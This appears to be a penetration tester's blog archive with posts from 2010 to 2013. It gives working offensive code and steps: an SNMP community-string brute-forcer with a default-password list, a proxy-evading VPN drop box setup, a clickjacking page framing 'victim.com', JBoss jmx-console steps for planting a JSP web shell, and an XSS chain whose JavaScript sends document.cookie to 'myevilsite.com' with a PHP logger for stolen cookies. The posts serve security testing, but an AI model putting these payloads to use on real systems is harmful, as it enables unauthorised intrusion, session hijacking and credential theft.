Sunday, August 4, 2013

A simple SNMP scanner in ruby

 #!/usr/bin/env ruby  
 require 'snmp'  
 unless ARGV[0]  
     puts "Please supply a file containing the target hosts"   
     exit  
 end  
 hosts = IO.readlines(ARGV[0])  
 comm_strings = ["public","private","0","0392a0","1234","2read","4changes","ANYCOM","Admin","C0de","CISCO","CR52401","IBM","ILMI","Intermec","NoGaH$@!","OrigEquipMfr","PRIVATE","PUBLIC","Private","Public","SECRET","SECURITY","SNMP","SNMP_trap","SUN","SWITCH","SYSTEM","Secret","Security","Switch","System","TENmanUFactOryPOWER","TEST","access","adm","admin","agent","agent_steal","all","all private","all public","apc","bintec","blue","c","cable-d","canon_admin","cc","cisco","community","core","debug","default","dilbert","enable","field","field-service","freekevin","fubar","guest","hello","hp_admin","ibm","ilmi","intermec","internal","l2","l3","manager","mngt","monitor","netman","network","none","openview","pass","password","pr1v4t3","proxy","publ1c","read","read-only","read-write","readwrite","red","regional","rmon","rmon_admin","ro","root","router","rw","rwa","san-fran","sanfran","scotty","secret","security","seri","snmp","snmpd","snmptrap","solaris","sun","superuser","switch","system","tech","test","test2","tiv0li","tivoli","trap","world","write","xyzzy","yellow"]  
 mib = ""  
 hosts.each do |host|  
  mib = ""  
  comm_strings.each do |comm|  
    break if mib != ""  
    SNMP::Manager.open(:Host => "#{host}", :community => "#{comm}", :retries => 0, :timeout => 1) do |manager|  
     begin  
      mib = manager.get_value("sysDescr.0")  
      puts "Detected community string: '#{comm}' with host: #{host}"  
     rescue Exception => msg  
      #puts msg  
     end  
    end  
  end  
 end  

Monday, May 6, 2013

Pen Testing Drop Box using OpenVpn in a restricted environment

Recently I had to perform a penetration test using a vmware box located at the customer's premises in US and accessing it remotely from Europe making use of OpenVpn and my standard pentesting laptop.
The objective of this post is to describe the OpenVpn configuration I used to connect to the box through the corporate proxy.
I am not going into details on howto setup a OpenVpn server as there are plenty of tutorials. Mine is using PKI and TLS.
Additionally the drop box I used is a Kali linux.
First and foremost the customer did not provide me with any details on the environment and deemed no VPN acces was possible. Well he was wrong....
The only possible access to the internet was through the corporate proxy and a proxy pac file.
First action was to download the pac file and understand which was the right proxy to use. You can normally look for a directive like:
return "PROXY 1.2.3.4:8080"

You should then consider that most of the proxies won't accept connection to port and protocol different from 443 and TCP.
So here you go with the OpenVpn client configuration.

client.conf

client
dev tun
proto tcp
remote <OpenVpn Server public address> 443
http-proxy <hostname/IP address of Proxy found in proxy pac file> <Proxy Port(ex. 8080)>
http-proxy-option AGENT Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-GB;+rv:1.7.6)+Gecko/20050226+Firefox/1.0.1
resolv-retry infinite
nobind

user nobody
group nogroup
persist-key
persist-tun

mute-replay-warnings

ca ca.crt
cert client.crt
key client.key

ns-cert-type server
tls-auth tlsauth.key 1

cipher BF-CBC
comp-lzo

verb 3
mute 20


And here it is the server's configuration.

server.conf

local <OpenVpn Server public address>
port 443
proto tcp
dev tun

ca 2.0/keys/ca.crt
cert 2.0/keys/server.crt
key 2.0/keys/server.key  # This file should be kept secret

dh 2.0/keys/dh1024.pem

tls-auth 2.0/keys/tlsauth.key 0

server 10.66.77.0 255.255.255.0
ifconfig-pool-persist ipp.txt
client-config-dir /etc/openvpn/ccd #we will assign the dropbox a static IP address see below

keepalive 10 120

cipher BF-CBC        # Blowfish (default)

comp-lzo
max-clients 3
client-to-client #Very important setting so you can ssh to the dropbox from your pentesting laptop which will be connected to the same OpenVpn server
user nobody
group nogroup
persist-key
persist-tun

status openvpn-status.log

verb 3
mute 20

Finally to assign the drop box a static IP, in /etc/openvpn/ccd create a file called client (should have the same name used for the certificate pub and private keys ex: john.crt and john.key)
$cat client
ifconfig-push 10.66.77.9 10.66.77.10

Connect both clients (your pentesting box and the remote vmware) to the OpenVpn server using:
openvpn --config /etc/openvpn/client.conf openvpn-client --verb 4
If all goes well you should be able to ping each other's clients.
Final step is to move all your files to /etc/openvpn/ and, to make OpenVpn start at boot on your drop box, issue:

sudo update-rc.d openvpn enable




Monday, April 8, 2013

Framable Web Page

Just a quick post to show you the code which can be used to frame a page inside your domain.
1:  <html>  
2:  <HEAD></HEAD>  
3:  <body>  
4:  <style>  
5:  iframe{  
6:  filter:alpha(opacity=0.2);opacity: 0.2;  
7:  position: absolute;top: 0px;left: 0px;  
8:  height: 500px;width: 600px;  
9:  }  
10:  img{  
11:  position: absolute;top: 0px;left: 0px;  
12:  height: 640px;width: 640px;  
13:  }  
14:  </style>  
15:  <img src="bushido.jpg">  
16:  <iframe src="https://victim.com"></iframe>  
17:  </body>  
18:  </html>  
You just need to adjust the opacity to make the victim's domain more or less visible.

Wednesday, March 14, 2012

Exporting MSF database content into CSV format

Hello everyone. So you have imported nmap scans into metasploit and created a workspace for every vlan in scope and suddenly the client ask you to give him all nmap scans in CSV format. If that is the case then this post is for you. I assume that you have installed postgres on your system and correctly configured it to be used by metasploit. I also assume the name of the database used by metasploit is msf_database. This value can be found within the database.yml file in your framework-x.x.x/config directory. So let's start then. The following commands are all you need to export addresses, ports and services from workspace whose id equals 2.

sudo su
su postgres 
psql -d msf_database -f /tmp/msf_in.txt -o /tmp/msf_out.txt
cat /tmp/msf_out.txt | tr "|" ";" | cut -d ";" -f "2-4" > myfile.csv


Where the content of msf_in.txt is:

select workspaces.name, hosts.address, services.port,services.name from (services join hosts on services.host_id=hosts.id)join workspaces on hosts.workspace_id=workspaces.id where workspaces.id=2;

Friday, June 25, 2010

The curious case of JBoss Hacking

Hi everyone.

Today I'd like to talk about the Hacking of Jboss.

There are lots of resources on the net about it but maybe reading this article will hopefully help you when you come to a dead end because the configuration is not so standard.

The prerequisite is that you have access to the jmx-console as admin.
It is not so rare seeing jboss where the jmx-console is not password protected.

Well now what...

You would like to shovel your nice shell by using the addURL() function in the DeploymentScanner, but suddenly you think wtf ....the victim machine cannot connect to my web server on any port (no reverse, only bind allowed)

There is a workaround as described in this very detailed and nice paper:

http://www.redteam-pentesting.de/publications/jboss (Read it before going further on)

The technique described is about using another jboss class called: DeploymentFileRepository
at:


http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin%3Aservice%3DDeploymentFileRepository


and its very useful store() function.
but sometimes thing go wrong anyway when you realize that after posting your jsp code, it doesn't get deployed by Jboss.
This is due to the fact that path where your, say shell.war, dir resides is not in the list of the deploymentscanner url and so the hot deployment fails
The solution is to verify where is your directory by inducing the server to an error:

Function description:

void store()

MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)
p2 java.lang.String (no description)
p3 java.lang.String (no description)
p4 java.lang.String (no description)
p5 boolean True False (no description)

Expected values:
p1 = shell.war (your dir name)
p2 = shell (name of the jsp file containing the code)
p3 = .jsp (extension)
p4 = (jsp code)
p5 = true

Error inducing values:
p1 = ../shell.war
p2 = shell
p3 = .jsp
p4 =
p5 = true

Next check the following line:

java.lang.IllegalArgumentException: child '../helpme.war' should be a child of parent '/prd/jboss/bws/web/bws106/./deploy/management'
org.jboss.console.manager.DeploymentFileRepository.getFile(DeploymentFileRepository.java:151)

The path '/prd/jboss/bws/web/bws106/deploy/management' is where your shell.war is residing.
Now that we know it, we have only to use the addURL() function of the deploymentscanner class.

So head to:
http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

Function description:

void addURL()

MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)


The url to input in the form relative to addURL() function is:
file:/prd/jboss/bws/web/bws106/deploy/management/

Note the trailing slash.

Now call your shell by loading the following url:

http://host:8080/shell/shell.jsp

Bye for now...

Tuesday, February 9, 2010

Ruby SOAP client with basic authentication and client certificate

During these days I had the need to do a pentest to a web service but since wsfuzzer wasn't working correctly I had to write my own ruby soap client that was able to connect to a ssl protected web service with client certificate and basic authentication.
After many hours spent looking for the suitable library, I've decided to use savon with ruby 1.8.7 (DON'T USE RUBY 1.9.1, it won't work).
First I had to convert 1 p12 certificate into 2 pem:
openssl pkcs12 -in global.p12 -out global.pem
Then we cut the private key part from global pem and copy it into protected_key.pem
and issue the command:
(you gotta provide the password of your private key)
mv global.pem cert.pem
openssl rsa -in protected_key.pem -out key.pem
The we can finally write the ruby code:

require 'rubygems'
require 'savon'
client = Savon::Client.new "https://example.com/services?wsdl" client.request.http.ssl_client_auth(
:cert = OpenSSL::X509::Certificate.new(File.read("cert.pem")),
:key = OpenSSL::PKey::RSA.new(File.read("key.pem")),
:verify_mode => OpenSSL::SSL::VERIFY_NONE )
#BASIC AUTHENTICATION
client.request.basic_auth "User", "Password"
puts client.wsdl.soap_actions
#puts client.wsdl.namespace_uri
#don't forget @inorder otherwise the client will send you key values in a different sequence different from #the one you wrote down
response = client.add_customer do |soap|
soap.body = {
:id =111,
:tel =1233,
:issuer =asder,
:payment_mode =1,
:alias =asd,
:@inorder = [:id, :tel, :issuer, :payment_mode, :alias] }
end
puts response.to_xml
Finally you have to add some permutation to your values to make it a real soap fuzzer. You can start by getting the file all_attacks.txt used by from WSFuzzer

Monday, January 25, 2010

How to steal cross domain cookies via double XSS

During a pentest to a big company using SSO (single-sign-on) system I found a stored xss in one of their site, call it "a.com". This site unfortunately doesn't partecipate in the SSO login system, so I had to devise a way to use it to steal the cookies from one of the SSO domains. After some tests I found that "b.com" (one of the SSO domains) was vulnerable to reflected xss, so by injecting an iframe in a.com that as a source was calling the vulnerable "b.com" url that in turn was loading an image that as a source was calling my server I managed to steal sso authenticated cookies. Let's see some code: (the code is taking advantage of jquery.js since it was originally loaded by a.com) The following code is an external js injected in the stored xss vulnerable parameter in "a.com"

$(document).ready(function() {
var el = document.createElement("iframe");
el.setAttribute('id', 'ifrm');
el.setAttribute('heigth', '0');
el.setAttribute('width', '0');
el.style.visibility="hidden";
document.body.appendChild(el);
url="http://www.b.com/index.php?query=%22%3CSCRIPT/SRC=http://myevilsite.com/Cookie_Stealer/ex.js?";
el.setAttribute('src', url);

});

where ex.js is:

var Image = document.createElement("img");
Image.setAttribute("width","30");
Image.src="http://myevilsite.com/Cookie_Stealer/stealer.php?c="+encodeURI(document.cookie)+"&location="+document.location;
and stealer.php code is:

<?php
$cookie = $_GET["c"];
echo $cookie;
$file = fopen("cookielog.txt", "a")
or die("Cannot open it");
fwrite($file, $cookie . "\n\n");
?>
Finally by visiting a.com while being logged to any of the SSO domains causes your credentials being sent to my server